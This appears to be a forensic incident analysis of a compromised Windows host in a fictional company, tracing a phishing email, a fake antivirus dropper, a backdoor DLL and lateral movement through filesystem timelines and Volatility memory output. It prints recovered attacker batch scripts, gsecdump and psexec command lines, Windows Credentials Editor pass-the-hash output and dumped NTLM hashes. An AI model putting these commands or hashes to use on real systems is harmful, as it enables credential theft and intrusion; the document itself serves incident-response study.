Timeline
User downloads and executes dropper noted by the creation of the prefetch file. Backdoor is placed on the machine.
Tue Nov 27 2012 00:17:58 100895 .ac. r/rr-xr-xr-x 0 0 12010-128-4 c:/WINDOWS/system32/6to4ex.dll
22270 macb r/rrwxrwxrwx 0 0 12011-128-4 c:/WINDOWS/Prefetch/SYMANTEC-1.43-1[2].EXE-330FB7E3.pf
Tool drop directory is created
Tue Nov 27 2012 00:18:31 56 ...b d/drwxrwxrwx 0 0 7555-144-5 c:/WINDOWS/webui
Tools being placed on the system
Tue Nov 27 2012 00:20:06 381816 macb r/rrwxrwxrwx 0 0 12000-128-3 c:/WINDOWS/ps.exe
Tue Nov 27 2012 00:20:33 303104 macb r/rrwxrwxrwx 0 0 12005-128-3 c:/WINDOWS/webui/gs.exe
Tue Nov 27 2012 00:20:36 381816 ...b r/rrwxrwxrwx 0 0 12012-128-3 c:/WINDOWS/webui/ps.exe
Tue Nov 27 2012 00:20:37 381816 m.c. r/rrwxrwxrwx 0 0 12012-128-3 c:/WINDOWS/webui/ps.exe
Tue Nov 27 2012 00:20:39 403968 ...b r/rrwxrwxrwx 0 0 12013-128-3 c:/WINDOWS/webui/ra.exe
Tue Nov 27 2012 00:20:40 403968 mac. r/rrwxrwxrwx 0 0 12013-128-3 c:/WINDOWS/webui/ra.exe
Tue Nov 27 2012 00:20:42 20480 macb r/rrwxrwxrwx 0 0 12014-128-3 c:/WINDOWS/webui/sl.exe
Tue Nov 27 2012 00:20:46 208384 m.cb r/rrwxrwxrwx 0 0 12015-128-3 c:/WINDOWS/webui/wc.exe
208384 m... r/rrwxrwxrwx 0 0 12031-128-3 c:/WINDOWS/system32/wc.exe
ipconfig is ran and at the same time netuse.dll is borne
Tue Nov 27 2012 00:21:12 10454 ...b r/rrwxrwxrwx 0 0 12016-128-3 c:/WINDOWS/webui/netuse.dll
55808 .a.. r/rrwxrwxrwx 0 0 24195-128-3 c:/WINDOWS/system32/ipconfig.exe
net commands, scanline and gsecdump dump are all ran. netuse.dll is modified
Tue Nov 27 2012 00:21:26 14550 ...b r/rrwxrwxrwx 0 0 12018-128-4 c:/WINDOWS/Prefetch/NET.EXE-01A53C2F.pf
Tue Nov 27 2012 00:21:41 14116 ...b r/rrwxrwxrwx 0 0 12019-128-4 c:/WINDOWS/Prefetch/NET1.EXE-029B9DB4.pf
Tue Nov 27 2012 00:23:09 6768 macb r/rrwxrwxrwx 0 0 12020-128-4 c:/WINDOWS/Prefetch/SL.EXE-010E2A23.pf
Tue Nov 27 2012 00:23:35 10454 mac. r/rrwxrwxrwx 0 0 12016-128-3 c:/WINDOWS/webui/netuse.dll
9990 macb r/rrwxrwxrwx 0 0 12021-128-4 c:/WINDOWS/Prefetch/GS.EXE-3796DDD9.pf
415744 .a.. r/rrwxrwxrwx 0 0 23442-128-3 c:/WINDOWS/system32/samsrv.dll
wc.exe (Windows Credentials Editor) is executed
Tue Nov 27 2012 00:24:18 13084 ...b r/rrwxrwxrwx 0 0 12022-128-4 c:/WINDOWS/Prefetch/WC.EXE-21AD5E60.pf
psexec is executed
Tue Nov 27 2012 00:27:21 10330 ...b r/rrwxrwxrwx 0 0 12023-128-4 c:/WINDOWS/Prefetch/PS.EXE-3A0FA6F9.pf
system1.bat is created
Tue Nov 27 2012 00:31:39 91 ...b r/rrwxrwxrwx 0 0 12024-128-4 c:/WINDOWS/system1.bat
psexec is ran a second time
Tue Nov 27 2012 00:33:32 9866 ...b r/rrwxrwxrwx 0 0 12025-128-4 c:/WINDOWS/Prefetch/PS.EXE-09745CC1.pf
system1.bat is modified
Tue Nov 27 2012 00:43:34 91 mac. r/rrwxrwxrwx 0 0 12024-128-4 c:/WINDOWS/system1.bat
system6.bat is created
Tue Nov 27 2012 00:43:45 184 macb r/rrwxrwxrwx 0 0 12026-128-1 c:/WINDOWS/system6.bat
psexec is ran again
Tue Nov 27 2012 00:44:16 9866 mac. r/rrwxrwxrwx 0 0 12025-128-4 c:/WINDOWS/Prefetch/PS.EXE-09745CC1.pf
Additional bat scripts are placed on the machine
Tue Nov 27 2012 00:53:29 69 ...b r/rrwxrwxrwx 0 0 12027-128-3 c:/WINDOWS/webui/system2.bat
Tue Nov 27 2012 00:56:18 69 mac. r/rrwxrwxrwx 0 0 12027-128-3 c:/WINDOWS/webui/system2.bat
Tue Nov 27 2012 00:59:00 56 macb r/rrwxrwxrwx 0 0 12028-128-1 c:/WINDOWS/webui/system3.bat
Tue Nov 27 2012 01:04:59 131 ...b r/rrwxrwxrwx 0 0 12029-128-3 c:/WINDOWS/webui/system4.bat
system4.bat is modified
Tue Nov 27 2012 01:11:00 131 mac. r/rrwxrwxrwx 0 0 12029-128-3 c:/WINDOWS/webui/system4.bat
system5.bat appears on the machine
Tue Nov 27 2012 01:19:41 88 ...b r/rrwxrwxrwx 0 0 12030-128-3 c:/WINDOWS/webui/system5.bat
56 mac. d/drwxrwxrwx 0 0 7555-144-5 c:/WINDOWS/webui
Tue Nov 27 2012 01:21:07 88 mac. r/rrwxrwxrwx 0 0 12030-128-3 c:/WINDOWS/webui/system5.bat
A scheduled task is created
Tue Nov 27 2012 01:21:18 208384 .a.. r/rrwxrwxrwx 0 0 12015-128-3 c:/WINDOWS/webui/wc.exe
208384 ...b r/rrwxrwxrwx 0 0 12031-128-3 c:/WINDOWS/system32/wc.exe
322 ...b r/rrwxrwxrwx 0 0 12032-128-1 c:/WINDOWS/Tasks/At1.job
12960 ...b r/rrwxrwxrwx 0 0 12033-128-4 c:/WINDOWS/Prefetch/AT.EXE-2770DD18.pf
25088 .a.. r/rrwxrwxrwx 0 0 24481-128-3 c:/WINDOWS/system32/at.exe
344 m.c. d/drwxrwxrwx 0 0 5458-144-1 c:/WINDOWS/Tasks
psexec is again executed
Tue Nov 27 2012 01:22:07 381816 .a.. r/rrwxrwxrwx 0 0 12012-128-3 c:/WINDOWS/webui/ps.exe
wc.exe is once again ran
Tue Nov 27 2012 01:23:23 13084 mac. r/rrwxrwxrwx 0 0 12022-128-4 c:/WINDOWS/Prefetch/WC.EXE-21AD5E60.pf
psexec is again ran
Tue Nov 27 2012 01:24:20 10330 mac. r/rrwxrwxrwx 0 0 12023-128-4 c:/WINDOWS/Prefetch/PS.EXE-3A0FA6F9.pf
net command being executed
Tue Nov 27 2012 01:27:31 14116 mac. r/rrwxrwxrwx 0 0 12019-128-4 c:/WINDOWS/Prefetch/NET1.EXE-029B9DB4.pf
124928 .a.. r/rrwxrwxrwx 0 0 23983-128-3 c:/WINDOWS/system32/net1.exe
42496 .a.. r/rrwxrwxrwx 0 0 23984-128-3 c:/WINDOWS/system32/net.exe
Scheduled task is executed
Tue Nov 27 2012 01:30:00 208384 .ac. r/rrwxrwxrwx 0 0 12031-128-3 c:/WINDOWS/system32/wc.exe
322 mac. r/rrwxrwxrwx 0 0 12032-128-1 c:/WINDOWS/Tasks/At1.job
268 macb r/rrwxrwxrwx 0 0 12034-128-1 c:/WINDOWS/system32/h.out
wce is executed as a result of the at job running
Tue Nov 27 2012 01:30:10 10720 macb r/rrwxrwxrwx 0 0 12035-128-4 c:/WINDOWS/Prefetch/WC.EXE-06BFE764.pf
Responder activity
Tue Nov 27 2012 01:42:21 95104 m... r/rrwxrwxrwx 0 0 12037-128-3 c:/Documents and Settings/amirs/mdd.exe
95104 m... r/rrwxrwxrwx 0 0 12038-128-3 c:/mdd.exe
Memory Analysis
Phishing email in memory
368906260 ceived: from ubuntu-router ([172.16.150.8]) by dc-ustxhou.petro-market.org with Microsoft SMTPSVC(6.0.3790.0);
368906372 Mon, 26 Nov 2012 14:00:08 -0600
368906407 Received: from d0793h (d0793h.petro-markets.info [58.64.132.141])
368906474 by ubuntu-router (8.14.3/8.14.3/Debian-9.2ubuntu1) with SMTP id qAQK06Co005842;
368906556 Mon, 26 Nov 2012 15:00:07 -0500
368906590 Message-ID: <FCE1C36C7BBC46AFB7C2A251EA868B8B@d0793h>
368906645 From: "Security Department" <isd@petro-markets.info>
368906699 To: <amirs@petro-market.org>, <callb@petro-market.org>,
368906756 <wrightd@petro-market.org>
368906792 Subject: Immediate Action
368906819 Date: Mon, 26 Nov 2012 14:59:38 -0500
368906858 MIME-Version: 1.0
368906877 Content-Type: multipart/alternative;
368906915 boundary="----=_NextPart_000_0015_01CDCBE6.A7B92DE0"
368906970 X-Priority: 3
368906985 X-MSMail-Priority: Normal
368907012 X-Mailer: Microsoft Outlook Express 6.00.2900.5512
368907064 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5512
368907122 Return-Path: isd@petro-markets.info
368907159 X-OriginalArrivalTime: 26 Nov 2012 20:00:08.0432 (UTC) FILETIME=[A2ABBF00:01CDCC10]
368907246 This is a multi-part message in MIME format.
368907294 ------=_NextPart_000_0015_01CDCBE6.A7B92DE0
368907339 Content-Type: text/plain;
368907366 charset="iso-8859-1"
368907389 Content-Transfer-Encoding: quoted-printable
368907436 Attn: Immediate Action is Required!!
368907476 The IS department is requiring that all associates update to the new =
368907548 version of anti-virus. This is critical and must be done ASAP! Failure =
368907624 to update anti-virus may result in negative actions.
368907680 Please download the new anti-virus and follow the instructions. Failure =
368907756 to install this anti-virus may result in loosing your job!
368907818 Please donwload at http://58.64.132.8/download/Symantec-1.43-1.exe
368907888 Regards,
368907898 The IS Department
Volatility connscan output shows C2 connection as well as connections to IIS-SARIYADH-03
Offset(P) Local Address Remote Address Pid
---------- ------------------------- ------------------------- ---
0x01fb0d48 172.16.223.187:2109 172.16.150.10:389 640
0x02023638 172.16.223.187:1265 58.64.132.141:80 1032
0x02035ae8 172.16.223.187:1259 172.16.150.10:445 4
0x02080930 172.16.223.187:1261 172.16.150.10:135 1032
0x020859d0 172.16.223.187:1210 172.16.223.47:445 4
0x020f0d38 172.16.223.187:2179 172.16.150.10:1025 696
0x0230d448 172.16.223.187:1241 172.16.150.10:389 632
0x0770fd48 172.16.223.187:2109 172.16.150.10:389 640
0x0836a638 172.16.223.187:1265 58.64.132.141:80 1032
0x084c7930 172.16.223.187:1261 172.16.150.10:135 1032
0x084ec9d0 172.16.223.187:1210 172.16.223.47:445 4
0x08594448 172.16.223.187:1241 172.16.150.10:389 632
0x09b5cae8 172.16.223.187:1259 172.16.150.10:445 4
0x0ac37d38 172.16.223.187:2179 172.16.150.10:1025 696
0x16066d48 172.16.223.187:2109 172.16.150.10:389 640
0x164d3638 172.16.223.187:1265 58.64.132.141:80 1032
0x16610930 172.16.223.187:1261 172.16.150.10:135 1032
0x16c559d0 172.16.223.187:1210 172.16.223.47:445 4
0x1869d448 172.16.223.187:1241 172.16.150.10:389 632
0x197a5ae8 172.16.223.187:1259 172.16.150.10:445 4
0x1a32ad38 172.16.223.187:2179 172.16.150.10:1025 696
0x1f209d48 172.16.223.187:2109 172.16.150.10:389 640
Volatility pslist plugin shows the backdoor is running svchost.exe. There are also psexec running as well as wce and cmd.exe processes with a ppid of 1032.
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
---------- -------------------- ------ ------ ------ -------- ------ ------ -------------------- --------------------
0x823c8830 System 4 0 51 287 ------ 0
0x82274b90 smss.exe 544 4 3 19 ------ 0 2012-11-26 22:01:51
0x82238da0 csrss.exe 608 544 13 387 0 0 2012-11-26 22:01:52
0x82214da0 winlogon.exe 632 544 17 652 0 0 2012-11-26 22:01:52
0x822ba638 services.exe 684 632 16 256 0 0 2012-11-26 22:01:53
0x822ab2d8 lsass.exe 696 632 20 411 0 0 2012-11-26 22:01:53
0x82244460 svchost.exe 860 684 14 188 0 0 2012-11-26 22:01:54
0x8217cb10 svchost.exe 944 684 9 261 0 0 2012-11-26 22:01:55
0x8228fda0 svchost.exe 1032 684 77 1558 0 0 2012-11-26 22:01:55
0x821753d8 svchost.exe 1076 684 6 84 0 0 2012-11-26 22:01:55
0x821bac10 svchost.exe 1128 684 14 249 0 0 2012-11-26 22:01:56
0x821b4a78 spoolsv.exe 1360 684 9 104 0 0 2012-11-26 22:01:58
0x82043da0 alg.exe 1888 684 6 104 0 0 2012-11-26 22:01:59
0x82223950 explorer.exe 296 260 9 366 0 0 2012-11-26 22:02:26
0x82226a20 msmsgs.exe 660 296 3 204 0 0 2012-11-26 22:02:32
0x821d43c0 ctfmon.exe 700 296 1 75 0 0 2012-11-26 22:02:32
0x821e8918 wuauclt.exe 1616 1032 3 142 0 0 2012-11-26 22:03:07
0x821d6598 msimn.exe 1984 296 7 361 0 0 2012-11-26 22:07:13
0x82034b40 cmd.exe 456 1032 0 -------- 0 0 2012-11-27 00:18:21 2012-11-27 00:27:30
0x8230dc88 ps.exe 1448 456 1 44 0 0 2012-11-27 00:27:11
0x820297b8 cmd.exe 1048 1032 0 -------- 0 0 2012-11-27 00:27:41 2012-11-27 01:22:20
0x821f7da0 ps.exe 1052 1048 2 60 0 0 2012-11-27 01:11:17
0x82228da0 cmd.exe 356 1032 0 -------- 0 0 2012-11-27 01:16:33 2012-11-27 01:22:17
0x81ffb2a0 ps.exe 228 356 2 65 0 0 2012-11-27 01:22:07
0x820001e0 wc.exe 1992 1032 1 27 0 0 2012-11-27 01:30:00
0x82004918 cmd.exe 1860 296 1 33 0 0 2012-11-27 01:42:52
0x8221d5a8 mdd.exe 988 1860 1 24 0 0 2012-11-27 01:46:00
Volatility plugin dlllist shows our backdoor in pid 1032
0x10000000 0x1c000 c:\windows\system32\6to4ex.dll
Successful privilege escalation to sysbackup user via wce
Attempts to run system1.bat against IIS-SARIYADH-03
442240521 Starting c:\windows\system1.bat on 172.16.223.47...
442240577 system1.bat exited on 172.16.223.47 with error code 1.
mft entry for system1.bat
system2.bat being executed against IIS-SARIYADH-03
\WINDOWS\System32\svchost.exe - ps \\172.16.223.47 -accepteula -c c:\windows\system2.bat
mft entry for system2.bat
mft entry for system3.bat
0000380: 0000 0000 0000 0000 4649 4c45 3000 0300 ........FILE0...
0000390: 6356 5b05 0000 0000 0300 0100 3800 0100 cV[.........8...
00003a0: 6001 0000 0004 0000 0000 0000 0000 0000 `...............
00003b0: 0300 0000 fc2e 0000 0800 0000 0000 0000 ................
00003c0: 1000 0000 6000 0000 0000 0000 0000 0000 ....`...........
00003d0: 4800 0000 1800 0000 6783 2063 3acc cd01 H.......g. c:...
00003e0: c2e5 2263 3acc cd01 c2e5 2263 3acc cd01 .."c:....."c:...
00003f0: c2e5 2263 3acc cd01 2000 0000 0000 0000 .."c:... .......
0000400: 0000 0000 0000 0000 0000 0000 1301 0000 ................
0000410: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0000420: 3000 0000 7000 0000 0000 0000 0000 0200 0...p...........
0000430: 5800 0000 1800 0100 831d 0000 0000 0200 X...............
0000440: 6783 2063 3acc cd01 6783 2063 3acc cd01 g. c:...g. c:...
0000450: 6783 2063 3acc cd01 6783 2063 3acc cd01 g. c:...g. c:...
0000460: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0000470: 2000 0000 0000 0000 0b03 7300 7900 7300 .........s.y.s.
0000480: 7400 6500 6d00 3300 2e00 6200 6100 7400 t.e.m.3...b.a.t.
0000490: 8000 0000 5000 0000 0000 1800 0000 0100 ....P...........
00004a0: 3800 0000 1800 0000 4065 6368 6f20 6f66 8.......@echo of
00004b0: 6620 0d0a 6469 7220 2f53 2043 3a5c 2a2e f ..dir /S C:\*.
00004c0: 6477 6720 3e20 633a 5c77 696e 646f 7773 dwg > c:\windows
00004d0: 5c77 6562 7569 5c68 7474 7073 2e64 6c6c \webui\https.dll
00004e0: ffff ffff 8279 4711 0000 0000 0000 0000 .....yG.
system4.bat being executed against IIS-SARIYADH-03
480667072 ps \\172.16.223.47 -accepteula -c c:\windows\webui\system4.bat
mft entry for system4.bat
At1.job executing wc.exe
70379040 "At1.job" (wc.exe)
70379080 Started 11/27/2012 4:30:00 AM
system5.bat being executed against IIS-SARIYADH-03
426451324 \WINDOWS\System32\svchost.exe - ps \\172.16.223.47 -accepteula -c c:\windows\webui\system5.bat
mft entry for system5.bat
mft entry for h.out
000260: 4649 4c45 3000 0300 e654 5d05 0000 0000 FILE0....T].....
0000270: 0500 0100 3800 0100 3002 0000 0004 0000 ....8...0.......
0000280: 0000 0000 0000 0000 0300 0000 022f 0000 ............./..
0000290: 0500 0000 0000 0000 1000 0000 6000 0000 ............`...
00002a0: 0000 0000 0000 0000 4800 0000 1800 0000 ........H.......
00002b0: 6168 88b7 3ecc cd01 6168 88b7 3ecc cd01 ah..>...ah..>...
00002c0: 6168 88b7 3ecc cd01 6168 88b7 3ecc cd01 ah..>...ah..>...
00002d0: 2000 0000 0000 0000 0000 0000 0000 0000 ...............
00002e0: 0000 0000 c806 0000 0000 0000 0000 0000 ................
00002f0: 0000 0000 0000 0000 3000 0000 6800 0000 ........0...h...
0000300: 0000 0000 0000 0200 4c00 0000 1800 0100 ........L.......
0000310: 1d00 0000 0000 0100 6168 88b7 3ecc cd01 ........ah..>...
0000320: 6168 88b7 3ecc cd01 6168 88b7 3ecc cd01 ah..>...ah..>...
0000330: 6168 88b7 3ecc cd01 0000 0000 0000 0000 ah..>...........
0000340: 0000 0000 0000 0000 2000 0000 0000 0000 ........ .......
0000350: 0503 6800 2e00 6f00 7500 7400 0000 0000 ..h...o.u.t.....
0000360: 8000 0000 2801 0000 0000 1800 0000 0100 ....(...........
0000370: 0c01 0000 1800 0000 616d 6972 733a 5045 ........amirs:PE
0000380: 5452 4f2d 4d41 524b 4554 3a46 3243 3645 TRO-MARKET:F2C6E
0000390: 4644 3337 4231 3034 4344 3731 4439 3141 FD37B104CD71D91A
00003a0: 3038 3144 3442 3337 3836 313a 3734 3444 081D4B37861:744D
00003b0: 3041 3632 3737 3737 3642 3436 4634 4242 0A6277776B46F4BB
00003c0: 3744 3044 3732 3343 3545 4444 0d0a 464c 7D0D723C5EDD..FL
00003d0: 442d 5341 5249 5941 4448 2d34 3324 3a50 D-SARIYADH-43$:P
00003e0: 4554 524f 2d4d 4152 4b45 543a 3030 3030 ETRO-MARKET:0000
00003f0: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000
0000400: 3030 3030 3030 3030 3030 3030 3a44 3332 000000000000:D32
0000410: 3341 3043 4243 3532 3037 3330 4237 3446 3A0CBC520730B74F
0000420: 4331 3839 3544 3533 3346 4534 330d 0a73 C1895D533FE43..s
0000430: 7973 6261 636b 7570 3a63 7572 7265 6e74 ysbackup:current
0000440: 3a43 3241 3339 3135 4446 3245 4337 3945 :C2A3915DF2EC79E
0000450: 4537 3331 3038 4542 3438 3037 3341 4342 E73108EB48073ACB
0000460: 373a 4537 4136 4632 3730 4631 4241 3536 7:E7A6F270F1BA56
0000470: 3241 3930 4532 4331 3333 4139 3544 3230 2A90E2C133A95D20
0000480: 3537 0d0a 0000 0000 ffff ffff 8279 4711 57...........yG.
mft entry for system6.bat
gsecdump command found
261942659 c:\windows\webui\gsecdump.exe -a >> c:\windows\webui\svchost.dll
365846531 Windows IP Configuration
365846561 Host Name . . . . . . . . . . . . : fld-sariyadh-43
365846623 Primary Dns Suffix . . . . . . . : petro-market.org
365846686 Node Type . . . . . . . . . . . . : Hybrid
365846739 IP Routing Enabled. . . . . . . . : No
365846788 WINS Proxy Enabled. . . . . . . . : No
365846837 DNS Suffix Search List. . . . . . : petro-market.org
365846903 Ethernet adapter Local Area Connection:
365846948 Connection-specific DNS Suffix . :
365846995 Description . . . . . . . . . . . : AMD PCNET Family PCI Ethernet Adapter
365847079 Physical Address. . . . . . . . . : 00-0C-29-A7-7C-6E
365847143 Dhcp Enabled. . . . . . . . . . . : No
365847192 IP Address. . . . . . . . . . . . : 172.16.223.187
365847253 Subnet Mask . . . . . . . . . . . : 255.255.255.0
365847313 Default Gateway . . . . . . . . . : 172.16.223.8
365847372 DNS Servers . . . . . . . . . . . : 172.16.150.10
365847432 Primary WINS Server . . . . . . . : 172.16.223.47
365847492 Server Name Remark
365847525 -------------------------------------------------------------------------------
365847606 \\DC-USTXHOU
365847687 \\ENG-USTXHOU-148
365847768 \\FLD-SARIYADH-43
365847849 \\IIS-SARIYADH-03
365847930 The command completed successfully.
365847969 Alias name administrators
365848000 Comment Administrators have complete and unrestricted access to the computer/domain
365848094 Members
365848105 -------------------------------------------------------------------------------
365848186 Administrator
365848201 Amir
365848207 PETRO-MARKET\amirs
365848227 PETRO-MARKET\Domain Admins
365848255 sysbackup
365848266 The command completed successfully.
365848305 There are no entries in the list.
365848344 Share name Resource Remark
365848399 -------------------------------------------------------------------------------
365848480 ADMIN$ C:\WINDOWS Remote Admin
365848561 C$ C:\ Default share
365848642 IPC$ Remote IPC
365848723 The command completed successfully.
365848762 These Windows services are started:
365848801 Application Layer Gateway Service
365848839 Automatic Updates
365848861 COM+ Event System
365848883 Computer Browser
365848904 Cryptographic Services
365848931 DCOM Server Process Launcher
365848964 DHCP Client
365848980 Distributed Link Tracking Client
365849017 DNS Client
365849032 Error Reporting Service
365849060 Event Log
365849060 Event Log
365849074 Help and Support
365849095 IPSEC Services
365849114 Logical Disk Manager
365849139 Microsoft Device Manager
365849168 Net Logon
365849182 Network Connections
365849206 Network Location Awareness (NLA)
365849243 Plug and Play
365849261 Print Spooler
365849279 Protected Storage
365849301 Remote Access Connection Manager
365849338 Remote Procedure Call (RPC)
365849370 Remote Registry
365849390 Secondary Logon
365849410 Security Accounts Manager
365849440 Server
365849451 Shell Hardware Detection
365849480 SSDP Discovery Service
365849507 System Event Notification
365849537 System Restore Service
365849564 Task Scheduler
365849583 TCP/IP NetBIOS Helper
365849609 Telephony
365849623 Terminal Services
365849645 Themes
365849656 WebClient
365849670 Windows Audio
365849688 Windows Firewall/Internet Connection Sharing (ICS)
365849743 Windows Management Instrumentation
365849782 Windows Time
365849799 Wireless Zero Configuration
365849831 Workstation
365849849 The command completed successfully.
365849888 Scan of 254 IPs started at Tue Nov 27 03:22:59 2012
365849943 -------------------------------------------------------------------------------
365850024 172.16.223.8
365850038 Responded in 0 ms.
365850058 0 hops away
365850071 Responds with ICMP unreachable: No
365850107 TCP ports: 21 80
365850129 TCP 21:
365850138 [220 (vsFTPd 2.3.0)]
365850162 TCP 80:
365850171 [HTTP/1.1 200 OK Date: Tue, 27 Nov 2012 00:23:08 GMT Server: Apache/2.2.16 (Ubuntu) Last-Modified: Fri, 23 Nov 2012 15:06:45 GMT ETag: "2194f-b1-4cf2aee9810d2]
365850334 -------------------------------------------------------------------------------
365850415 172.16.223.47
365850430 Responded in 0 ms.
365850450 0 hops away
365850463 Responds with ICMP unreachable: No
365850499 TCP ports: 80 445
365850522 TCP 80:
Successful privilege escalation to sysbackup user via wce
148200795 C:\WINDOWS\webui>
148202516 v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
148202638 Use -h for help.
148202658 Changing NTLM credentials of current logon session (000003E7h) to:
148202726 Username: sysbackup
148202747 domain: current
148202764 LMHash: c2a3915df2ec79ee73108eb48073acb7
148202806 NTHash: e7a6f270f1ba562a90e2c133a95d2057
148202848 NTLM credentials successfully changed!
148202890 C:\WINDOWS\webui>
442240521 Starting c:\windows\system1.bat on 172.16.223.47...
442240577 system1.bat exited on 172.16.223.47 with error code 1.
0000300: 4649 4c45 3000 0300 d198 5a05 0000 0000 FILE0.....Z.....
0000310: 0400 0100 3800 0100 8801 0000 0004 0000 ....8...........
0000320: 0000 0000 0000 0000 0500 0000 f82e 0000 ................
0000330: 0900 0000 0000 0000 1000 0000 6000 0000 ............`...
0000340: 0000 0000 0000 0000 4800 0000 1800 0000 ........H.......
0000350: 512b 1191 36cc cd01 16df f33a 38cc cd01 Q+..6......:8...
0000360: 16df f33a 38cc cd01 16df f33a 38cc cd01 ...:8......:8...
0000370: 2000 0000 0000 0000 0000 0000 0000 0000 ...............
0000380: 0000 0000 1301 0000 0000 0000 0000 0000 ................
0000390: 0000 0000 0000 0000 3000 0000 7000 0000 ........0...p...
00003a0: 0000 0000 0000 0200 5800 0000 1800 0100 ........X.......
00003b0: 1c00 0000 0000 0100 512b 1191 36cc cd01 ........Q+..6...
00003c0: 512b 1191 36cc cd01 512b 1191 36cc cd01 Q+..6...Q+..6...
00003d0: 512b 1191 36cc cd01 0000 0000 0000 0000 Q+..6...........
00003e0: 0000 0000 0000 0000 2000 0000 0000 0000 ........ .......
00003f0: 0b03 7300 7900 7300 7400 6500 6d00 3100 ..s.y.s.t.e.m.1.
0000400: 2e00 6200 6100 7400 8000 0000 7800 0000 ..b.a.t.....x...
0000410: 0000 1800 0000 0400 5b00 0000 1800 0000 ........[.......
0000420: 4065 6368 6f20 6f66 660d 0a6d 6b64 6972 @echo off..mkdir
0000430: 2063 3a5c 7769 6e64 6f77 735c 7765 6275 c:\windows\webu
0000440: 690d 0a6e 6574 2073 6861 7265 207a 3d63 i..net share z=c
0000450: 3a5c 7769 6e64 6f77 735c 7765 6275 6920 :\windows\webui
0000460: 2f47 5241 4e54 3a73 7973 6261 636b 7570 /GRANT:sysbackup
0000470: 2c46 554c 4c0d 0a0d 0a0d 0a6e 6669 6720 ,FULL......nfig
0000480: ffff ffff 8279 4711 633a 5c77 696e 646f .....yG.c:\windo
0000490: 7773 5c77 6562 7569 5c73 7973 7465 6d2e ws\webui\system.
00004a0: 646c 6c0d 0a6e 6574 2073 6861 7265 203e dll..net share >
00004b0: 3e20 633a 5c77 696e 646f 7773 5c77 6562 > c:\windows\web
00004c0: 7569 5c73 7973 7465 6d2e 646c 6c0d 0a6e ui\system.dll..n
00004d0: 6574 2073 7461 7274 203e 3e20 633a 5c77 et start >> c:\w
00004e0: 696e 646f 7773 5c77 6562 7569 5c73 7973 indows\webui\sys
00004f0: 7465 6d2e 646c 6c0d 0a6e 6574 2076 6965 tem.dll..net vie
0000500: 7720 3e3e 2063 3a5c 7769 6e64 6f77 735c w >> c:\windows\
0000510: 7765 6275 695c 7379 7374 656d 2e64 6c6c webui\system.dll
0000520: 0d0a 0d0a 0000 0000 ffff ffff 8279 4711 .............yG.
0000340: 0000 0000 0000 0000 4649 4c45 3000 0300 ........FILE0...
0000350: 5632 5b05 0000 0000 0300 0100 3800 0100 V2[.........8...
0000360: 7001 0000 0004 0000 0000 0000 0000 0000 p...............
0000370: 0400 0000 fb2e 0000 0300 0000 0000 0000 ................
0000380: 1000 0000 6000 0000 0000 0000 0000 0000 ....`...........
0000390: 4800 0000 1800 0000 9016 789d 39cc cd01 H.........x.9...
00003a0: 98f9 4b02 3acc cd01 98f9 4b02 3acc cd01 ..K.:.....K.:...
00003b0: 98f9 4b02 3acc cd01 2000 0000 0000 0000 ..K.:... .......
00003c0: 0000 0000 0000 0000 0000 0000 1301 0000 ................
00003d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00003e0: 3000 0000 7000 0000 0000 0000 0000 0200 0...p...........
00003f0: 5800 0000 1800 0100 831d 0000 0000 0200 X...............
0000400: 9016 789d 39cc cd01 9016 789d 39cc cd01 ..x.9.....x.9...
0000410: 9016 789d 39cc cd01 9016 789d 39cc cd01 ..x.9.....x.9...
0000420: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0000430: 2000 0000 0000 0000 0b03 7300 7900 7300 .........s.y.s.
0000440: 7400 6500 6d00 3200 2e00 6200 6100 7400 t.e.m.2...b.a.t.
0000450: 8000 0000 6000 0000 0000 1800 0000 0300 ....`...........
0000460: 4500 0000 1800 0000 4065 6368 6f20 6f66 E.......@echo of
0000470: 660d 0a63 3a5c 7769 6e64 6f77 735c 7765 f..c:\windows\we
0000480: 6275 695c 6773 2e65 7865 202d 6120 3e3e bui\gs.exe -a >>
0000490: 2063 3a5c 7769 6e64 6f77 735c 7765 6275 c:\windows\webu
00004a0: 695c 7376 6368 6f73 742e 646c 6c73 742e i\svchost.dllst.
00004b0: ffff ffff 8279 4711 ffff ffff 8279 4711 .....yG
0000380: 0000 0000 0000 0000 4649 4c45 3000 0300 ........FILE0...
0000390: 6356 5b05 0000 0000 0300 0100 3800 0100 cV[.........8...
00003a0: 6001 0000 0004 0000 0000 0000 0000 0000 `...............
00003b0: 0300 0000 fc2e 0000 0800 0000 0000 0000 ................
00003c0: 1000 0000 6000 0000 0000 0000 0000 0000 ....`...........
00003d0: 4800 0000 1800 0000 6783 2063 3acc cd01 H.......g. c:...
00003e0: c2e5 2263 3acc cd01 c2e5 2263 3acc cd01 .."c:....."c:...
00003f0: c2e5 2263 3acc cd01 2000 0000 0000 0000 .."c:... .......
0000400: 0000 0000 0000 0000 0000 0000 1301 0000 ................
0000410: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0000420: 3000 0000 7000 0000 0000 0000 0000 0200 0...p...........
0000430: 5800 0000 1800 0100 831d 0000 0000 0200 X...............
0000440: 6783 2063 3acc cd01 6783 2063 3acc cd01 g. c:...g. c:...
0000450: 6783 2063 3acc cd01 6783 2063 3acc cd01 g. c:...g. c:...
0000460: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0000470: 2000 0000 0000 0000 0b03 7300 7900 7300 .........s.y.s.
0000480: 7400 6500 6d00 3300 2e00 6200 6100 7400 t.e.m.3...b.a.t.
0000490: 8000 0000 5000 0000 0000 1800 0000 0100 ....P...........
00004a0: 3800 0000 1800 0000 4065 6368 6f20 6f66 8.......@echo of
00004b0: 6620 0d0a 6469 7220 2f53 2043 3a5c 2a2e f ..dir /S C:\*.
00004c0: 6477 6720 3e20 633a 5c77 696e 646f 7773 dwg > c:\windows
00004d0: 5c77 6562 7569 5c68 7474 7073 2e64 6c6c \webui\https.dll
00004e0: ffff ffff 8279 4711 0000 0000 0000 0000 .....yG.
system4.bat being executed against IIS-SARIYADH-03
480667072 ps \\172.16.223.47 -accepteula -c c:\windows\webui\system4.bat
mft entry for system4.bat
